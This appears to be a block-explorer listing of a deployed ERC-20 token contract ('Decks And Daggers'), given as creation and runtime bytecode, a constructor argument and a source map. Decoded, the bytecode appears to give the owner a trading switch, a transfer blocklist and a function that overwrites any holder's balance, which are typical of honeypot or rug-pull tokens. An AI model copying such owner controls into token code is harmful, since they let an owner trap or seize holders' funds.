4782611d15565b602082019050919050565b600061175f6021836119d3565b915061176a82611d3e565b604082019050919050565b60006117826025836119d3565b915061178d82611d8d565b604082019050919050565b60006117a56000836119d3565b91506117b082611ddc565b600082019050919050565b60006117c86024836119d3565b91506117d382611ddf565b604082019050919050565b60006117eb6025836119d3565b91506117f682611e2e565b604082019050919050565b61180a81611aac565b82525050565b60006020820190506118256000830184611638565b92915050565b600060208201905081810360008301526118458184611647565b905092915050565b6000602082019050818103600083015261186681611680565b9050919050565b60006020820190508181036000830152611886816116a3565b9050919050565b600060208201905081810360008301526118a6816116c6565b9050919050565b600060208201905081810360008301526118c6816116e9565b9050919050565b600060208201905081810360008301526118e68161170c565b9050919050565b600060208201905081810360008301526119068161172f565b9050919050565b6000602082019050818103600083015261192681611752565b9050919050565b6000602082019050818103600083015261194681611775565b9050919050565b6000602082019050818103600083015261196681611798565b9050919050565b60006020820190508181036000830152611986816117bb565b9050919050565b600060208201905081810360008301526119a6816117de565b9050919050565b60006020820190506119c26000830184611801565b92915050565b600081519050919050565b600082825260208201905092915050565b60006119ef82611aac565b91506119fa83611aac565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611a2f57611a2e611b1b565b5b828201905092915050565b6000611a4582611aac565b9150611a5083611aac565b925082821015611a6357611a62611b1b565b5b828203905092915050565b6000611a7982611a8c565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b60005b83811015611ad4578082015181840152602081019050611ab9565b83811115611ae3576000848401525b50505050565b60006002820490506001821680611b0157607f821691505b60208210811415611b1557611b14611b4a565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f5472616e7366657220616d6f756e74206d75737420626520677261746572207460008201527f6861746e207a65726f0000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b50565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b611e8681611a6e565b8114611e9157600080fd5b50565b611e9d81611aac565b8114611ea857600080fd5b5056fea2646970667358221220987c51d047a4ad174b3539ce11388bb230ad8396e444ec09d46ffd224d88d90564736f6c63430008010033204465636b7320416e642044616767657273207c20742e6d652f4465636b73416e644461676765727300000000000000000000000000000000000000000000000006f05b59d3b20000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101165760003560e01c806395d89b41116100a2578063ac8a93b811610071578063ac8a93b814610309578063c78b6dea14610327578063ca43051914610343578063dd62ed3e1461035f578063f3b95cd71461038f57610116565b806395d89b411461026f5780639f08b3191461028d578063a457c2d7146102a9578063a9059cbb146102d957610116565b8063313ce567116100e9578063313ce567146101b757806339509351146101d55780633cd64cf31461020557806370a0823114610235578063749b991e1461026557610116565b806306fdde031461011b578063095ea7b31461013957806318160ddd1461016957806323b872dd14610187575b600080fd5b6101236103ab565b604051610130919061182b565b60405180910390f35b610153600480360381019061014e91906115d3565b61043d565b6040516101609190611810565b60405180910390f35b61017161045b565b60405161017e91906119ad565b60405180910390f35b6101a1600480360381019061019c9190611584565b610465565b6040516101ae9190611810565b60405180910390f35b6101bf610566565b6040516101cc91906119ad565b60405180910390f35b6101ef60048036038101906101ea91906115d3565b610570565b6040516101fc9190611810565b60405180910390f35b61021f600480360381019061021a919061151f565b61061c565b60405161022c9190611810565b60405180910390f35b61024f600480360381019061024a919061151f565b610672565b60405161025c91906119ad565b60405180910390f35b61026d6106ba565b005b6102776107a4565b604051610284919061182b565b60405180910390f35b6102a760048036038101906102a2919061151f565b610836565b005b6102c360048036038101906102be91906115d3565b610920565b6040516102d09190611810565b60405180910390f35b6102f360048036038101906102ee91906115d3565b610a14565b6040516103009190611810565b60405180910390f35b610311610a32565b60405161031e9190611810565b60405180910390f35b610341600480360381019061033c919061160f565b610a49565b005b61035d6004803603810190610358919061151f565b610ae3565b005b61037960048036038101906103749190611548565b610bce565b60405161038691906119ad565b60405180910390f35b6103a960048036038101906103a491906115d3565b610c55565b005b6060600580546103ba90611ae9565b80601f01602080910402602001604051908101604052809291908181526020018280546103e690611ae9565b80156104335780601f1061040857610100808354040283529160200191610433565b820191906000526020600020905b81548152906001019060200180831161041657829003601f168201915b5050505050905090565b600061045161044a610cf3565b8484610cfb565b6001905092915050565b6000600354905090565b6000610472848484610ec6565b6000600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006104bd610cf3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561053d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610534906118cd565b60405180910390fd5b61055a85610549610cf3565b85846105559190611a3a565b610cfb565b60019150509392505050565b6000600754905090565b600061061261057d610cf3565b84846002600061058b610cf3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461060d91906119e4565b610cfb565b6001905092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b3373ffffffffffffffffffffffffffffffffffffffff16600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461074a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610741906118ed565b60405180910390fd5b60011515600860009054906101000a900460ff1615151415610786576000600860006101000a81548160ff0219169083151502179055506107a2565b6001600860006101000a81548160ff0219169083151502179055505b565b6060600680546107b390611ae9565b80601f01602080910402602001604051908101604052809291908181526020018280546107df90611ae9565b801561082c5780601f106108015761010080835404028352916020019161082c565b820191906000526020600020905b81548152906001019060200180831161080f57829003601f168201915b5050505050905090565b3373ffffffffffffffffffffffffffffffffffffffff16600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146108c6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108bd906118ed565b60405180910390fd5b60018060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b6000806002600061092f610cf3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156109ec576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109e39061198d565b60405180910390fd5b610a096109f7610cf3565b858584610a049190611a3a565b610cfb565b600191505092915050565b6000610a28610a21610cf3565b8484610ec6565b6001905092915050565b6000600860009054906101000a900460ff16905090565b3373ffffffffffffffffffffffffffffffffffffffff16600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610ad9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ad0906118ed565b60405180910390fd5b8060048190555050565b3373ffffffffffffffffffffffffffffffffffffffff16600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610b73576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b6a906118ed565b60405180910390fd5b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b3373ffffffffffffffffffffffffffffffffffffffff16600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610ce5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cdc906118ed565b60405180910390fd5b610cef82826113ad565b5050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d6b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d629061196d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610ddb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dd29061188d565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610eb991906119ad565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610f36576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f2d9061192d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610fa6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f9d9061184d565b60405180910390fd5b60008111610fe9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fe09061186d565b60405180910390fd5b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168061108a5750600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156110e65760001515600860009054906101000a900460ff161515146110e5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110dc9061194d565b60405180910390fd5b5b60011515600860009054906101000a900460ff16151514806111555750600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b806111ad5750600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b15611351576111bd8383836114f0565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611243576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161123a906118ad565b60405180910390fd5b818161124f9190611a3a565b6000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546112df91906119e4565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161134391906119ad565b60405180910390a3506113a8565b60011515600860009054906101000a900460ff161515146113a7576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161139e9061194d565b60405180910390fd5b5b505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561141d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114149061190d565b60405180910390fd5b8060045461142b9190611a3a565b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550806003600082825461147f9190611a3a565b92505081905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516114e491906119ad565b60405180910390a35050565b505050565b60008135905061150481611e7d565b92915050565b60008135905061151981611e94565b92915050565b60006020828403121561153157600080fd5b600061153f848285016114f5565b91505092915050565b6000806040838503121561155b57600080fd5b6000611569858286016114f5565b925050602061157a858286016114f5565b9150509250929050565b60008060006060848603121561159957600080fd5b60006115a7868287016114f5565b93505060206115b8868287016114f5565b92505060406115c98682870161150a565b9150509250925092565b600080604083850312156115e657600080fd5b60006115f4858286016114f5565b92505060206116058582860161150a565b9150509250929050565b60006020828403121561162157600080fd5b600061162f8482850161150a565b91505092915050565b61164181611a80565b82525050565b6000611652826119c8565b61165c81856119d3565b935061166c818560208601611ab6565b61167581611b79565b840191505092915050565b600061168d6023836119d3565b915061169882611b8a565b604082019050919050565b60006116b06029836119d3565b91506116bb82611bd9565b604082019050919050565b60006116d36022836119d3565b91506116de82611c28565b604082019050919050565b60006116f66026836119d3565b915061170182611c77565b604082019050919050565b60006117196028836119d3565b915061172482611cc6565b604082019050919050565b600061173c6020836119d3565b915061174782611d15565b602082019050919050565b600061175f6021836119d3565b915061176a82611d3e565b604082019050919050565b60006117826025836119d3565b915061178d82611d8d565b604082019050919050565b60006117a56000836119d3565b91506117b082611ddc565b600082019050919050565b60006117c86024836119d3565b91506117d382611ddf565b604082019050919050565b60006117eb6025836119d3565b91506117f682611e2e565b604082019050919050565b61180a81611aac565b82525050565b60006020820190506118256000830184611638565b92915050565b600060208201905081810360008301526118458184611647565b905092915050565b6000602082019050818103600083015261186681611680565b9050919050565b60006020820190508181036000830152611886816116a3565b9050919050565b600060208201905081810360008301526118a6816116c6565b9050919050565b600060208201905081810360008301526118c6816116e9565b9050919050565b600060208201905081810360008301526118e68161170c565b9050919050565b600060208201905081810360008301526119068161172f565b9050919050565b6000602082019050818103600083015261192681611752565b9050919050565b6000602082019050818103600083015261194681611775565b9050919050565b6000602082019050818103600083015261196681611798565b9050919050565b60006020820190508181036000830152611986816117bb565b9050919050565b600060208201905081810360008301526119a6816117de565b9050919050565b60006020820190506119c26000830184611801565b92915050565b600081519050919050565b600082825260208201905092915050565b60006119ef82611aac565b91506119fa83611aac565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611a2f57611a2e611b1b565b5b828201905092915050565b6000611a4582611aac565b9150611a5083611aac565b925082821015611a6357611a62611b1b565b5b828203905092915050565b6000611a7982611a8c565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b60005b83811015611ad4578082015181840152602081019050611ab9565b83811115611ae3576000848401525b50505050565b60006002820490506001821680611b0157607f821691505b60208210811415611b1557611b14611b4a565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f5472616e7366657220616d6f756e74206d75737420626520677261746572207460008201527f6861746e207a65726f0000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b50565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b611e8681611a6e565b8114611e9157600080fd5b50565b611e9d81611aac565b8114611ea857600080fd5b5056fea2646970667358221220987c51d047a4ad174b3539ce11388bb230ad8396e444ec09d46ffd224d88d90564736f6c63430008010033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000000000000000000000000000006f05b59d3b20000

-----Decoded View---------------
Arg [0] : initialSupply (uint256): 500000000000000000

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000006f05b59d3b20000


Deployed Bytecode Sourcemap

17022:509:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8032:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10934:169;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9161:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11585:418;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8994:102;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12412:215;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9505:119;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9957:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9632:159;;;:::i;:::-;;8251:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9391:106;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;13130:375;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10398:175;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9800:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10092:89;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9281:102;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;10636:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17420:108;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8032:100;8086:13;8119:5;8112:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8032:100;:::o;10934:169::-;11017:4;11034:39;11043:12;:10;:12::i;:::-;11057:7;11066:6;11034:8;:39::i;:::-;11091:4;11084:11;;10934:169;;;;:::o;9161:108::-;9222:7;9249:12;;9242:19;;9161:108;:::o;11585:418::-;11691:4;11708:36;11718:6;11726:9;11737:6;11708:9;:36::i;:::-;11755:24;11782:11;:19;11794:6;11782:19;;;;;;;;;;;;;;;:33;11802:12;:10;:12::i;:::-;11782:33;;;;;;;;;;;;;;;;11755:60;;11854:6;11834:16;:26;;11826:79;;;;;;;;;;;;:::i;:::-;;;;;;;;;11916:57;11925:6;11933:12;:10;:12::i;:::-;11966:6;11947:16;:25;;;;:::i;:::-;11916:8;:57::i;:::-;11991:4;11984:11;;;11585:418;;;;;:::o;8994:102::-;9052:7;9079:9;;9072:16;;8994:102;:::o;12412:215::-;12500:4;12517:80;12526:12;:10;:12::i;:::-;12540:7;12586:10;12549:11;:25;12561:12;:10;:12::i;:::-;12549:25;;;;;;;;;;;;;;;:34;12575:7;12549:34;;;;;;;;;;;;;;;;:47;;;;:::i;:::-;12517:8;:80::i;:::-;12615:4;12608:11;;12412:215;;;;:::o;9505:119::-;9570:4;9594:12;:22;9607:8;9594:22;;;;;;;;;;;;;;;;;;;;;;;;;9587:29;;9505:119;;;:::o;9957:127::-;10031:7;10058:9;:18;10068:7;10058:18;;;;;;;;;;;;;;;;10051:25;;9957:127;;;:::o;9632:159::-;7895:10;7885:20;;:6;;;;;;;;;;;:20;;;7877:65;;;;;;;;;;;;:::i;:::-;;;;;;;;;9727:4:::1;9711:20;;:12;;;;;;;;;;;:20;;;9707:77;;;9749:5;9734:12;;:20;;;;;;;;;;;;;;;;;;9707:77;;;9778:4;9763:12;;:19;;;;;;;;;;;;;;;;;;9707:77;9632:159::o:0;8251:104::-;8307:13;8340:7;8333:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8251:104;:::o;9391:106::-;7895:10;7885:20;;:6;;;;;;;;;;;:20;;;7877:65;;;;;;;;;;;;:::i;:::-;;;;;;;;;9485:4:::1;9460:12:::0;:22:::1;9473:8;9460:22;;;;;;;;;;;;;;;;:29;;;;;;;;;;;;;;;;;;9391:106:::0;:::o;13130:375::-;13223:4;13240:24;13267:11;:25;13279:12;:10;:12::i;:::-;13267:25;;;;;;;;;;;;;;;:34;13293:7;13267:34;;;;;;;;;;;;;;;;13240:61;;13340:15;13320:16;:35;;13312:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;13408:67;13417:12;:10;:12::i;:::-;13431:7;13459:15;13440:16;:34;;;;:::i;:::-;13408:8;:67::i;:::-;13493:4;13486:11;;;13130:375;;;;:::o;10398:175::-;10484:4;10501:42;10511:12;:10;:12::i;:::-;10525:9;10536:6;10501:9;:42::i;:::-;10561:4;10554:11;;10398:175;;;;:::o;9800:94::-;9850:4;9874:12;;;;;;;;;;;9867:19;;9800:94;:::o;10092:89::-;7895:10;7885:20;;:6;;;;;;;;;;;:20;;;7877:65;;;;;;;;;;;;:::i;:::-;;;;;;;;;10168:5:::1;10158:7;:15;;;;10092:89:::0;:::o;9281:102::-;7895:10;7885:20;;:6;;;;;;;;;;;:20;;;7877:65;;;;;;;;;;;;:::i;:::-;;;;;;;;;9370:5:::1;9345:12;:22;9358:8;9345:22;;;;;;;;;;;;;;;;:30;;;;;;;;;;;;;;;;;;9281:102:::0;:::o;10636:151::-;10725:7;10752:11;:18;10764:5;10752:18;;;;;;;;;;;;;;;:27;10771:7;10752:27;;;;;;;;;;;;;;;;10745:34;;10636:151;;;;:::o;17420:108::-;7895:10;7885:20;;:6;;;;;;;;;;;:20;;;7877:65;;;;;;;;;;;;:::i;:::-;;;;;;;;;17499:21:::1;17505:7;17514:5;17499;:21::i;:::-;17420:108:::0;;:::o;2033:98::-;2086:7;2113:10;2106:17;;2033:98;:::o;15974:346::-;16093:1;16076:19;;:5;:19;;;;16068:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;16174:1;16155:21;;:7;:21;;;;16147:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;16258:6;16228:11;:18;16240:5;16228:18;;;;;;;;;;;;;;;:27;16247:7;16228:27;;;;;;;;;;;;;;;:36;;;;16296:7;16280:32;;16289:5;16280:32;;;16305:6;16280:32;;;;;;:::i;:::-;;;;;;;;15974:346;;;:::o;13995:915::-;14119:1;14101:20;;:6;:20;;;;14093:70;;;;;;;;;;;;:::i;:::-;;;;;;;;;14203:1;14182:23;;:9;:23;;;;14174:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;14273:1;14264:6;:10;14256:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;14335:12;:20;14348:6;14335:20;;;;;;;;;;;;;;;;;;;;;;;;;:47;;;;14359:12;:23;14372:9;14359:23;;;;;;;;;;;;;;;;;;;;;;;;;14335:47;14331:97;;;14418:5;14402:21;;:12;;;;;;;;;;;:21;;;14394:34;;;;;;;;;;;;:::i;:::-;;;;;;;;;14331:97;14459:4;14443:20;;:12;;;;;;;;;;;:20;;;:40;;;;14477:6;;;;;;;;;;;14467:16;;:6;:16;;;14443:40;:63;;;;14500:6;;;;;;;;;;;14487:19;;:9;:19;;;14443:63;14439:463;;;14519:47;14540:6;14548:9;14559:6;14519:20;:47::i;:::-;14577:21;14601:9;:17;14611:6;14601:17;;;;;;;;;;;;;;;;14577:41;;14654:6;14637:13;:23;;14629:74;;;;;;;;;;;;:::i;:::-;;;;;;;;;14750:6;14734:13;:22;;;;:::i;:::-;14714:9;:17;14724:6;14714:17;;;;;;;;;;;;;;;:42;;;;14791:6;14767:9;:20;14777:9;14767:20;;;;;;;;;;;;;;;;:30;;;;;;;:::i;:::-;;;;;;;;14830:9;14813:35;;14822:6;14813:35;;;14841:6;14813:35;;;;;;:::i;:::-;;;;;;;;14439:463;;;;14891:4;14875:20;;:12;;;;;;;;;;;:20;;;14866:34;;;;;;;;;;;;:::i;:::-;;;;;;;;;14439:463;13995:915;;;:::o;15247:285::-;15350:1;15331:21;;:7;:21;;;;15323:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;15432:6;15422:7;;:16;;;;:::i;:::-;15401:9;:18;15411:7;15401:18;;;;;;;;;;;;;;;:37;;;;15465:6;15449:12;;:22;;;;;;;:::i;:::-;;;;;;;;15513:1;15487:37;;15496:7;15487:37;;;15517:6;15487:37;;;;;;:::i;:::-;;;;;;;;15247:285;;:::o;16923:92::-;;;;:::o;7:139:1:-;;91:6;78:20;69:29;;107:33;134:5;107:33;:::i;:::-;59:87;;;;:::o;152:139::-;;236:6;223:20;214:29;;252:33;279:5;252:33;:::i;:::-;204:87;;;;:::o;297:262::-;;405:2;393:9;384:7;380:23;376:32;373:2;;;421:1;418;411:12;373:2;464:1;489:53;534:7;525:6;514:9;510:22;489:53;:::i;:::-;479:63;;435:117;363:196;;;;:::o;565:407::-;;;690:2;678:9;669:7;665:23;661:32;658:2;;;706:1;703;696:12;658:2;749:1;774:53;819:7;810:6;799:9;795:22;774:53;:::i;:::-;764:63;;720:117;876:2;902:53;947:7;938:6;927:9;923:22;902:53;:::i;:::-;892:63;;847:118;648:324;;;;;:::o;978:552::-;;;;1120:2;1108:9;1099:7;1095:23;1091:32;1088:2;;;1136:1;1133;1126:12;1088:2;1179:1;1204:53;1249:7;1240:6;1229:9;1225:22;1204:53;:::i;:::-;1194:63;;1150:117;1306:2;1332:53;1377:7;1368:6;1357:9;1353:22;1332:53;:::i;:::-;1322:63;;1277:118;1434:2;1460:53;1505:7;1496:6;1485:9;1481:22;1460:53;:::i;:::-;1450:63;;1405:118;1078:452;;;;;:::o;1536:407::-;;;1661:2;1649:9;1640:7;1636:23;1632:32;1629:2;;;1677:1;1674;1667:12;1629:2;1720:1;1745:53;1790:7;1781:6;1770:9;1766:22;1745:53;:::i;:::-;1735:63;;1691:117;1847:2;1873:53;1918:7;1909:6;1898:9;1894:22;1873:53;:::i;:::-;1863:63;;1818:118;1619:324;;;;;:::o;1949:262::-;;2057:2;2045:9;2036:7;2032:23;2028:32;2025:2;;;2073:1;2070;2063:12;2025:2;2116:1;2141:53;2186:7;2177:6;2166:9;2162:22;2141:53;:::i;:::-;2131:63;;2087:117;2015:196;;;;:::o;2217:109::-;2298:21;2313:5;2298:21;:::i;:::-;2293:3;2286:34;2276:50;;:::o;2332:364::-;;2448:39;2481:5;2448:39;:::i;:::-;2503:71;2567:6;2562:3;2503:71;:::i;:::-;2496:78;;2583:52;2628:6;2623:3;2616:4;2609:5;2605:16;2583:52;:::i;:::-;2660:29;2682:6;2660:29;:::i;:::-;2655:3;2651:39;2644:46;;2424:272;;;;;:::o;2702:366::-;;2865:67;2929:2;2924:3;2865:67;:::i;:::-;2858:74;;2941:93;3030:3;2941:93;:::i;:::-;3059:2;3054:3;3050:12;3043:19;;2848:220;;;:::o;3074:366::-;;3237:67;3301:2;3296:3;3237:67;:::i;:::-;3230:74;;3313:93;3402:3;3313:93;:::i;:::-;3431:2;3426:3;3422:12;3415:19;;3220:220;;;:::o;3446:366::-;;3609:67;3673:2;3668:3;3609:67;:::i;:::-;3602:74;;3685:93;3774:3;3685:93;:::i;:::-;3803:2;3798:3;3794:12;3787:19;;3592:220;;;:::o;3818:366::-;;3981:67;4045:2;4040:3;3981:67;:::i;:::-;3974:74;;4057:93;4146:3;4057:93;:::i;:::-;4175:2;4170:3;4166:12;4159:19;;3964:220;;;:::o;4190:366::-;;4353:67;4417:2;4412:3;4353:67;:::i;:::-;4346:74;;4429:93;4518:3;4429:93;:::i;:::-;4547:2;4542:3;4538:12;4531:19;;4336:220;;;:::o;4562:366::-;;4725:67;4789:2;4784:3;4725:67;:::i;:::-;4718:74;;4801:93;4890:3;4801:93;:::i;:::-;4919:2;4914:3;4910:12;4903:19;;4708:220;;;:::o;4934:366::-;;5097:67;5161:2;5156:3;5097:67;:::i;:::-;